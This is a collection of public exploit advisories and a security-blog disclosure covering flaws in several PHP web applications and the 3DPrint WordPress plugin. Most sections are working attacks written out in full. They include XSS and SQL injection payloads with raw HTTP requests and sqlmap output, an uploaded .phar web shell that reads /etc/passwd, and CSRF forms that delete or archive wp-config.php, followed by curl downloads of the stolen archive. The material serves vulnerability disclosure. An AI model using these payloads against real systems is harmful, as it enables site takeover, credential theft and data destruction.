JobSeeker version 1.5 suffers from a cross site scripting vulnerability.

    # Exploit Title: JobSeeker 1.5 - Reflected XSS# Exploit Author: CraCkEr# Date: 15/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/jobseeker/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /jobseeker/search-result.phpGET parameter 'kw' is vulnerable to RXSSGET parameter 'lc' is vulnerable to RXSSGET parameter 'ct' is vulnerable to RXSSGET parameter 'cp' is vulnerable to RXSSGET parameter 'p' is vulnerable to RXSShttps://website/jobseeker/search-result.php?kw=[XSS]&lc=[XSS]&ct=[XSS]&cp=[XSS]&p=[XSS][-] Done

JobSeeker 1.5 Cross Site Scripting

News Portal version 4.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)# Date: 09/07/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643# Version: 4.0# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example  1-----------------------------------------------------------------------------------------------------------------------Param: name, email, comment-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 277Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:55:26 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 146161<script>alert('comment successfully submit. Comment will be display after admin review ');</script><!DOCTYPE html><html lang="en">  <head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="">    <meta name="author" content="">    <title>News Portal | Home Page  [...]-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 276Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:56:06 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 525Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21Stack trace:#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w-----------------------------------------------------------------------------------------------------------------------SQLMap example param 'comment':-----------------------------------------------------------------------------------------------------------------------sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:---Parameter: #2* ((custom) POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=---web application technology: PHP 8.1.17, Apache 2.4.56bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)## Example 2 - login to administration panel-----------------------------------------------------------------------------------------------------------------------Param: username-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 42Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin'&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:00:53 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 505Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13Stack trace:#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 43Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin''&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:02:15 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 4733Connection: closeContent-Type: text/html; charset=UTF-8<script>alert('Invalid Details');</script><!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <meta name="description" content="News Portal.">        <meta name="author" content="PHPGurukul">                <title>News Portal | Admin Panel</title>[...]

News Portal 4.0 SQL Injection

Ecommerce version 1.15 suffers from a cross site scripting vulnerability.

    # Exploit Title: Ecommerce 1.15 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/ecommerce/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /ecommerce/blog-single.phpGET parameter 'slug' is vulnerable to RXSShttps://website/ecommerce/blog-single.php?slug=[XSS]Path: /ecommerce/product.phpGET parameter 'id' is vulnerable to RXSShttps://website/ecommerce/product.php?id=[XSS][-] Done

Ecommerce 1.15 Cross Site Scripting

Insurance version 1.2 suffers from a cross site scripting vulnerability.

    # Exploit Title: Insurance 1.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 16/07/2023# Vendor: phpscriptpoint# Vendor Homepage: https://phpscriptpoint.com/# Software Link: https://demo.phpscriptpoint.com/insurance/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /insurance/page.phpURL parameter is vulnerable to RXSShttps://website/insurance/page.php/[XSS]?slug=blog&page=3Path: /insurance/search.phpURL parameter is vulnerable to RXSShttps://website/insurance/search.php/[XSS]?search_string=&page=3[-] Done

Insurance 1.2 Cross Site Scripting

ProjeQtOr Project Management System version 10.4.1 suffers from multiple cross site scripting vulnerabilities.

    Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSSVersion: V10.4.1Bugs:  Multiple XSSTechnology: PHPVendor URL: https://www.projeqtor.orgSoftware Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/downloadDate of found: 09.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC                                     ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E                                    ### XSS-2 ###steps: 1. login to account2. go projects and create project3.add attachment3. upload svg file"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""4. Go to  svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )                                       ### XSS-3 ###Go to below adress (post request)POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1Host: localhostContent-Length: 35sec-ch-ua: Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36sec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/projeqtor/view/main.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3Connection: closeresultAck=<script>alert(4)</script>

ProjeQtOr Project Management System 10.4.1 Cross Site Scripting

Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

The 3DPrint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will create an archive of any files or directories on the target server by tricking a logged in admin into submitting a form. Furthermore the created archive has a predictable location and name, allowing the attacker to download the file if they know the time at which the form was submitted, making it possible to leak sensitive files like the WordPress configuration containing database credentials and secrets.

The premium version of the WordPress plugin 3DPrint is vulnerable to Cross Site Request Forgery (CSRF) and directory traversal attacks when the file manager functionality is enabled. These vulnerabilities allow an attacker to delete or get access to arbitrary files and directories on the affected sites, including sensitive files like the site configuration files, which again could lead to a full site takeover.

Recently, while looking over some potential false positives flagged by our experimental signatures, we discovered some code that puzzled us in the 3DPrint premium plugin.

require\_once("../../../../../../wp-load.php");
if ( !current\_user\_can('administrator') ) exit;
$p3d\_settings = get\_option( 'p3d\_settings' );

global $wpdb;

set\_time\_limit(0);
ini\_set( 'memory\_limit', '-1' );

This snippet was found in the Tiny File Manager PHP module located within the include directory of the plugin, but is not found in the original Tiny File Manager project. It seems to be injected with the intention to integrate it with the WordPress role-based access controls. 

Loading WordPress code files like this in an unrelated module is usually a sign that something is a bit off, so we decided to investigate further.

The observant reader will notice that access to the module is limited to users with the Administrator role, but there are no nonce checks. That would be ok if Tiny File Manager had its own CSRF protection, but as this was not the case, it looks like this code may be susceptible to a CSRF attack. (Tiny File Manager has since added CSRF protection after we made them aware of the issue. Version 2.5.0 and later should be a lot safer to use!)

A complicating factor is that Tiny File Manager is _not_ included in the package when installing 3DPrint premium but is downloaded on demand when activated. The version downloaded at the time of writing is version 2.4.4, but it has been heavily modified by the 3DPrint developers, and is downloaded from their domain, not directly from the Tiny File Manager repositories.

Most of the changes made remove functionality not used by the plugin, as well as a few other changes, like hard-coding the path, limiting what the file manager should be able to access. In addition, the authentication and authorization features built into Tiny File Manager have been disabled and replaced by the above integration with the WordPress role system.

We have discovered a couple of vulnerabilities where the combination of the modified access controls and inclusion of the Tiny File Manager in the 3DPrint plugin becomes exploitable to an outside attacker. This includes deleting or downloading sensitive files, potentially allowing for a full site takeover. These vulnerabilities exploit the lack of nonce checks in the modified access controls, along with directory traversal vulnerabilities in Tiny File Manager itself.

We have tried to contact the vendor of both the 3DPrint plugin and the Tiny File Manager project. Of these, only the developers of the Tiny File Manager project have responded to us and fixed the issues we submitted to them.

**Check out our new WAF as part of Jetpack Scan, which will protect against these attacks out of the box. It’s currently in beta. Jetpack Scan will also detect the vulnerable component, and help with removing it.**

As the Tiny File Manager module is downloaded and installed on demand, there’s not necessarily a correspondence between the plugin version and the version of Tiny File Manager being used. However, once installed, there does not seem to be an easy way to update the Tiny File Manager module apart from manually deleting it and activating it again.

For this reason, we consider all versions of 3DPrint to be vulnerable to the below vulnerabilities if the file manager has been activated.

**The vulnerabilities****1\. CSRF leading to arbitrary file/directory deletion**

*   Plugin: 3DPrint
*   Plugin slug: 3dprint
*   Plugin URI: http://www.wp3dprinting.com/2015/07/29/changelog/
*   Vulnerable versions: all
*   Fixed version: none
*   CVSS Score: 8.2 (High, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L)
*   CVE: CVE-2022-3899

The mass delete functionality in the included version of Tiny File Manager (version 2.4.4) is not properly protected against directory traversal and also lacks CSRF protections. This allows an attacker to trick an admin into deleting multiple files or even directories on the server recursively. 

// Mass deleting
if (isset($\_POST\['group'\], $\_POST\['delete'\]) && !FM\_READONLY) {
    $path = FM\_ROOT\_PATH;
    if (FM\_PATH != '') {
//        $path .= '/' . FM\_PATH;
    }

    $errors = 0;
    $files = $\_POST\['file'\];
    if (is\_array($files) && count($files)) {
        foreach ($files as $f) {
            if ($f != '') {
                $new\_path = $path . '/' . $f;
                if (!fm\_rdelete($new\_path)) {
                    $errors++;
                }
            }
        }
        if ($errors == 0) {
            fm\_set\_msg('Selected files and folder deleted');
        } else {
            fm\_set\_msg('Error while deleting items', 'error');
        }
    } else {
        fm\_set\_msg('Nothing selected', 'alert');
    }

    fm\_redirect(FM\_SELF\_URL . '?p=' . urlencode(FM\_PATH));
}

This can be exploited by passing the group and delete POST parameters to any value, and passing an array of files/directories to delete in the file parameter. The variable $new_path is a simple concatenation of the FM_ROOT_PATH and the passed in filename, passed to the recursive delete function fm_rdelete(). As fm_rdelete() does not do any validation of the pathnames it’s given, this makes this code vulnerable to a directory traversal attack.

Here’s an example proof of concept: 

<form action="https://example.com/wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
    <input type="hidden" name="group" value="1">
    <input type="hidden" name="delete" value="1">
    <input type="hidden" name="file\[1\]" value="../2020">
    <input type="hidden" name="file\[2\]" value="../../../wp-config.php">
    <input type="submit" value="Get rich!">
</form>

All paths are relative to the wp-content/uploads/p3d/ directory on the server. When any logged-in admin clicks the button to get rich, their uploads from 2020 will be deleted along with the sites wp-config.php file. 

**2\. CSRF leading to arbitrary downloads**

*   Plugin: 3DPrint
*   Plugin slug: 3dprint
*   Plugin URI: http://www.wp3dprinting.com/2015/07/29/changelog/
*   Vulnerable versions: all
*   Fixed version: none
*   CVSS Score: 7.4 (High, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N)
*   CVE: CVE-2022-4023

The functionality in the included version of Tiny File Manager (version 2.4.4) to download a zip or tar archive of selected files is not protected against directory traversal and lacks CSRF protections. This allows an attacker to trick an admin into creating a zip or tar archive with arbitrary files and directories from the site, including configuration files or other sensitive content.

The archive is placed in the normal 3DPring upload directory, wp-content/uploads/p3d/. The file name is only partially controllable by the attacker but is predictable enough that it should be relatively easy to brute force. If they know at what time the forged request was sent it should also be trivial to make an educated guess.

// Pack files
if (isset($\_POST\['group'\]) && (isset($\_POST\['zip'\]) || isset($\_POST\['tar'\])) && !FM\_READONLY) {
    $path = FM\_ROOT\_PATH;
    $ext = 'zip';
    if (FM\_PATH != '') {
//        $path .= '/' . FM\_PATH;
    }

    //set pack type
    $ext = isset($\_POST\['tar'\]) ? 'tar' : 'zip';

    $files = $\_POST\['file'\];
    if (!empty($files)) {
        chdir($path);

        if (count($files) == 1) {
            $one\_file = reset($files);
            $one\_file = basename($one\_file);
            $zipname = $one\_file . '\_' . date('ymd\_His') . '.'.$ext;
        } else {
            $zipname = 'archive\_' . date('ymd\_His') . '.'.$ext;
        }

        if($ext == 'zip') {
            $zipper = new FM\_Zipper();
            $res = $zipper->create($zipname, $files);
        } elseif ($ext == 'tar') {
            $tar = new FM\_Zipper\_Tar();
            $res = $tar->create($zipname, $files);
        }

By sending a post request with the group and either the zip or tar variables set to any value will create an archive with the files specified in the file parameter. The current date and time will be appended to the file name for the archive, which will have the same base name as the file archived, or “archive” if several files are archived together. The archive will be created in the 3DPrint upload directory, but the path names of the files are not sanitized, and can contain paths outside this directory, making it vulnerable to directory traversal attacks.

To exploit this vulnerability, we created a simple payload module for Metasploit that serves as a self-submitting form with the malicious payload to the vulnerable site. The proof of concept payload sent was:

<!DOCTYPE html>
<html>
  <body>
    <form action="https://3dprint-test.ddev.site/wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
      <input type="hidden" name="group" value="1">
      <input type="hidden" name="zip" value="1">
      <input type="hidden" name="file\[1\]" value="../2022">
      <input type="hidden" name="file\[2\]" value="../../../wp-config.php">
    </form>
    <script>document.forms\[0\].submit()</script>
  </body>
</html>

As the Metasploit module would record the timestamp of when the form was sent, that made it easy to guess the correct filename for the archive created.

% msfconsole                                                                                
                                                  
msf6 > use payload/html/html\_reverse\_http
msf6 payload(html/html\_reverse\_http) > set LHOST localhost
LHOST => localhost
msf6 payload(html/html\_reverse\_http) > set LURI /
LURI => /
msf6 payload(html/html\_reverse\_http) > set PAYLOADFILE ../poc/poc-csrf-archive.html
PAYLOADFILE => ../poc/poc-csrf-archive.html
msf6 payload(html/html\_reverse\_http) > to\_handler
\[\*\] Payload Handler Started as Job 0
\[\*\] Started HTTP reverse handler on http://\[::1\]:8080/
\[\*\] http://localhost:8080/ handling request from ::1; (UUID: rhexpfwi) Request processed at 2022-12-10T11:06:49+01:00

msf6 payload(html/html\_reverse\_http) > exit

% curl -I 'https://3dprint-test.ddev.site/wp-content/uploads/p3d/archive\_221210\_100649.zip'
HTTP/2 200 
server: nginx/1.20.1
date: Sat, 10 Dec 2022 10:07:35 GMT
content-type: application/zip
content-length: 87225
last-modified: Sat, 10 Dec 2022 10:06:49 GMT
etag: "63945a39-154b9"
accept-ranges: bytes


% curl -O 'https://3dprint-test.ddev.site/wp-content/uploads/p3d/archive\_221210\_100649.zip'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 87225  100 87225    0     0  2322k      0 --:--:-- --:--:-- --:--:-- 2366k

% unzip -v archive\_221210\_100649.zip 
Archive:  archive\_221210\_100649.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
       0  Stored        0   0% 2022-12-10 10:06 00000000  ../2022/
       0  Stored        0   0% 2022-12-10 10:06 00000000  ../2022/12/
   85888  Defl:X    85655   0% 2022-12-10 10:05 724f1f67  ../2022/12/funny-cat.jpg
    1955  Defl:X     1114  43% 2022-11-01 23:25 96f2088a  ../../../wp-config.php
--------          -------  ---                            -------
   87843            86769   1%                            4 files

Notice how we can deduce the filename of the generated archive from the timestamp of the request. In this case, the server container is running one timezone behind the local timezone.

**Recommendations**

As the version of the file manager installed is independent of the version of the plugin installed, we cannot recommend a fixed version of the plugin. 

Neither have we found an easy way to update the file manager module if a new version is released at a later date.

For this reason, we consider all versions of the 3DPrint premium plugin vulnerable if the file manager component is enabled.

Our recommendation is to make sure the file manager module is disabled, _and_ that the file is removed from the site.

